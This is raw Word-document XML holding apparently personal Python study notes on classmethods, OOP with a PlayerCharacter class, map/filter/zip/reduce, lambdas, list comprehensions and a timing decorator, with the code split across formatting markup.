    </w:p>
    <w:p w14:paraId="7C7A284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56913E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When using @classmethod decorator to instantiate a Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2D370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we must instantiate the Class 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cls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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A58EC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@classmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A62D30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def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func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cls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, arg1, arg2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4603D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Otherwise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050D27B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TypeError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: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adding_things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 takes 2 positional arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B9798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but 3 were given</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A795A3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'player1.adding_things():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adding_things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C87903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7B4F88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Instantiating player4 using a function from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Class.Attribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54AE5B3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player4 =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PlayerCharacter.adding_things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(num1,num2) =&gt;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Class.Attribute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(arg1,arg2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEED5A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rather than just calling the Class =&gt; player4 =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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48864A3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player4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adding_things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2DB14A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'player4.age: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player4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9B4F6C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E6B3602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29AAF965" wp14:editId="1F2E6C4A">
            <wp:extent cx="4368800" cy="5092700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57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DA2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8D49B2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F51F02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442C91E" w14:textId="77777777" w:rsidR="008725FA" w:rsidRDefault="008725FA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7577DE96" w14:textId="5D3F6642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getting blueprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A3247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March 10, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B9D7F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4:18 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9E310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creating-project.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CC031C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9FFEA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OOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF9DA7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2F3FBB4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3AFFC8B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__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init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__ is called whenever we instantiate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2EF7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self refers to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PlayerCharacter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E6A694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__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init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__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>):    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43566F1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 xml:space="preserve">name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># attributes / properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1889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 xml:space="preserve">age </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># attributes / properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E121FF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1861EE8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run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00094F3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self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is running :D'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02FFEF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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'done'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C542BD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Instantiate player1 using class    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542362E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'Player1'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20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C96A61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  <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>help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player1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6F911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'player1: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51DB7B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'player1.name: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</w:p>
    <w:p w14:paraId="701D75D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'player1.age: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53F9AB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41E586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'player1.run():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player1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run</w:t>
      </w:r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B3375E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03E5DF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3A7476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PlayerCharacter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'Player2'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24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36B64F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player2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.attack = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0CDCB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#print(f'player2:\n{player2}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7D922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#print(f'player2.name: {player2.name}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5DE63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#print(f'player2.age: {player2.age}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355E7A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#print(f'player2.attack: {player2.attack}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5E94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34F35EA7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2FD0921" wp14:editId="5054244F">
            <wp:extent cx="3403600" cy="2324100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58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EAE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47BAA7D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01C510" wp14:editId="29F1D2E7">
            <wp:extent cx="4076700" cy="3175000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59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6B2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44A19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3F834E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412AFAE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Multi-threading vs </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multi-processing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5BEA624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February 13, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CA17B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6:58 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD797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16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threading vs multiprocessing in python</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F2A835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CFE16D1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D34A476" wp14:editId="279613B7">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60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4B2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571C4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5E466D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2C7FCE9" w14:textId="77777777" w:rsidR="008725FA" w:rsidRDefault="008725FA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564B50C0" w14:textId="313399AB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=== F</w:t>
      </w:r>
      <w:r w:rsidR="008725FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">unctional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="008725FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rogramming (FP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2265CA9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3618D6F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10:14 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FBCE1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41D6A8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78D46D0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Simplicity over data structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E27E1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490D159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10:14 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16025A1D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37F2CF2" wp14:editId="00EC151D">
            <wp:extent cx="5511800" cy="3759200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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7C19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DB448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0E1CEF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DA57009" w14:textId="77777777" w:rsidR="008725FA" w:rsidRDefault="008725FA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01CE5365" w14:textId="239B0898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Pure Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636205D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42879D4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10:17 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AA24F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any inputs =&gt; always the same results returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558954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262DF0B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BF29ACD" wp14:editId="25299D31">
            <wp:extent cx="6210300" cy="1587500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62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693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1B809A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 side-effects, all methods will NOT affect the global scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C56CE4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934D46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AC69834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proofErr w:type="gramStart"/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map(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC9F76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722515A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10:48 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BC0BA6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8802343" wp14:editId="76D59F99">
            <wp:extent cx="5880100" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63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7955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C88FE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map.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10468431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C4A006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map, filter, zip, reduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFE368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C7E9B0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global [] = immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F42E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No side-effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486511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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1A98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Accepting a list of data as item argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31CD8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multiply_by2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14A5947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2F3CB74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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4750CF4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#print(map(multiply_by2, [1,2,3])) # &lt;map object at 0x000001FD094671F0&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022D9E0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'my_list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B136ED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38F3BB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'list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(map(multiply_by2,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)):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7B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>list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map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multiply_by2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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># [2, 4, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F1D82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00FD5A3C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C589DC0" wp14:editId="6EA8C19D">
            <wp:extent cx="2273300" cy="1168400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64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670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32BFFA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9FAE6D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977C241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proofErr w:type="gramStart"/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filter(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6264138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344EDD3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10:51 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508879E4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B188F68" wp14:editId="58426DDC">
            <wp:extent cx="4140200" cy="3949700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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8F88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050152B" w14:textId="77777777" w:rsidR="008725FA" w:rsidRDefault="008725FA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3923C8BC" w14:textId="1EC7C151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filter.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD89EC7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5000E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map, filter, zip, reduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F51C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30C0B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global [] = immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5E17A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No side-effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD4B9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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670999F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Accepting a list of data as item argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7665CA0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multiply_by2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3A04CBE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650E664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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7477A9E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accept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(item) as an argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF095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return odd numbers in the list only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7495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check_odd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22267C6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397F72C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 xml:space="preserve"> % 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899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696323B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1B5D309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list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filter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check_odd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))) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611EE5C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7961EEF6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77D6C0A" wp14:editId="71A66A4F">
            <wp:extent cx="1282700" cy="469900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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543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FC1B88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5D1AD8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ED7F829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27FABF47" w14:textId="5BCAD19A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proofErr w:type="gramStart"/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zip(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988D93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7201E55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10:50 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC792E5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8495F20" wp14:editId="51D2FCDB">
            <wp:extent cx="5461000" cy="4000500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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2AB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E9EDED4" w14:textId="77777777" w:rsidR="005D4128" w:rsidRDefault="005D4128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5081976D" w14:textId="0E57F000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zip.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B033F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D848C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map, filter, zip, reduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6CB94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global [] = immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050DDC5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No side-effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCA20B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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0855C7A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your_list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899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9FE5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Accepting a list of data as item argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFBFF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multiply_by2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0474A84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0A683FB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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C61822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accept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(item) as an argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CC271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return odd numbers in the list only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A041A9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check_odd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3A7CAAA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5BACCC4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 xml:space="preserve"> % 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899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2564F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289EE87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Zipping 2 lists together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7347FDE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list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zip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your_list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))) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># [(1, 10), (2, 20), (3, 30)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE58D3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20677DA1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63B3A2C" wp14:editId="493370F1">
            <wp:extent cx="1892300" cy="520700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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B4CA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CC76660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580A7EA" wp14:editId="43B69818">
            <wp:extent cx="5803900" cy="4483100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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38F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28DECD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EF5B3A0" wp14:editId="42F8D1F9">
            <wp:extent cx="2514600" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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497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F27691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5F88CA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B389398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proofErr w:type="gramStart"/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reduce(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74831F8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655CB0A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11:41 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF16B81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E9C16EB" wp14:editId="252830EE">
            <wp:extent cx="5829300" cy="5803900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71" name="Pictur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80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0B3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1D9A854" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00095B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  <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>reduce.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B8CCF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F5C96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map, filter, zip, reduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553D277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from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functools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262034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global [] = immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93D9B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No side-effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F148EB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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3A34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your_list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899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608C89E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their_list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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A924C7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Accepting a list of data as item argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C2EE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multiply_by2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01EFF3D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6D6A411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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050F6B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accept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(item) as an argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D159A9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return odd numbers in the list only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D8004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check_odd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198F557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2ACEC6D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 xml:space="preserve"> % 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899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AF15A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2CDF531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accumulator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acc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0E83202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#print(1,2) =&gt; 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5776262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#print(3,3) =&gt; 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA19A4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'(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acc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, item):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acc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item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4A86AE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acc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item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A53A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908BDF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print(list(reduce(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func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, sequence, data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C3CF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default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acc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= 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C9FC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'reduce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(accumulator,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, 0):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989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reduce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accumulator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03AAEC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64EAF3B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1E9E218" wp14:editId="54937F12">
            <wp:extent cx="2197100" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72" name="Pictur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15B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F3FF36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369F7B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351B30C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Lambda expressions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504EC5B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790344E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11:50 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D77732B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97EB2E7" wp14:editId="4CA207D5">
            <wp:extent cx="4483100" cy="3213100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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9E7E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79253F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ex-lambda-expression.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD37A1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3BD4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Square</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5D017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4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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540D416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'list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(map(lambda item: item ** 2,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))'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B925E0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new_list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list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map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 xml:space="preserve">lambda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** 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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592E6EC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'new_list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new_list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55C137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863BA4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List Sorting based on 2nd value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED63B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 xml:space="preserve"> = [(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), (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4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>), (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>), (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,-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)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6218743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a.sort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(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E8BE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a.sort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(key='', reverse='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B9689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key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 xml:space="preserve">lambda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA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72A1BA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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEF577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'a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EFBDA9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EFE4CBE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F134DE4" wp14:editId="22A02A07">
            <wp:extent cx="2895600" cy="1054100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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E62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D4F4F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1C6461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E7B3665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list comprehension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2A55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1CED128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12:22 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DECB9C8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5790E4E" wp14:editId="4026B647">
            <wp:extent cx="4178300" cy="2032000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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0075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F46A51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list-comprehension.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64375ECE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B3CF8A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list [] set {} dictionary {'a': 'a', 'b': 'b'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1CD7A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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4689A3C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 xml:space="preserve">char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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'hello'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295C735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append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char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AC1A1F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516FD7B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'my_list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AB2CCB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86538E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454312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82BA9DF" wp14:editId="2E208EF4">
            <wp:extent cx="2082800" cy="698500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76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AF01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44A7BF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83E26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69100CE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3218F04C" wp14:editId="01C75C4B">
            <wp:extent cx="4140200" cy="4597400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="77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969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15B15D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82C6410" wp14:editId="3A07AA35">
            <wp:extent cx="6337300" cy="1054100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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117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FA472B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D1E60A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3198F6A" wp14:editId="169FBF62">
            <wp:extent cx="3797300" cy="1117600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79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0EB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091AF0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97DDF55" wp14:editId="3CED735B">
            <wp:extent cx="6375400" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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3E8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7ABCF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8B086EF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performance decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7735369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4F7B5E4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2:41 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADC782C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C6F3BBA" wp14:editId="52534E52">
            <wp:extent cx="4826000" cy="5740400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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1A8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A35B87B" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00095B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  <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>performance-decorator.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F34829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52421E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Decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0636D44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from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">time </w:t>
      </w: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989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0079497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creating a higher function performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4804D04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to wrap a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func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to accept *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, **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kwargs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BB7BA9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performance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527D328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2807530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Thus we can pass as many params as possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C084CE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wrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(*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, **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kwargs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257AA68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6D52C7B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time1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time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1BC4359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514966D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(*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, **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kwargs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7FAC5F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A8913E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time2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time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37CD853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'took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time2-time1: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time2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>time1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seconds'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27BA7C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CE15F1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</w:p>
    <w:p w14:paraId="2D0A5D6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01AE4D6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989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
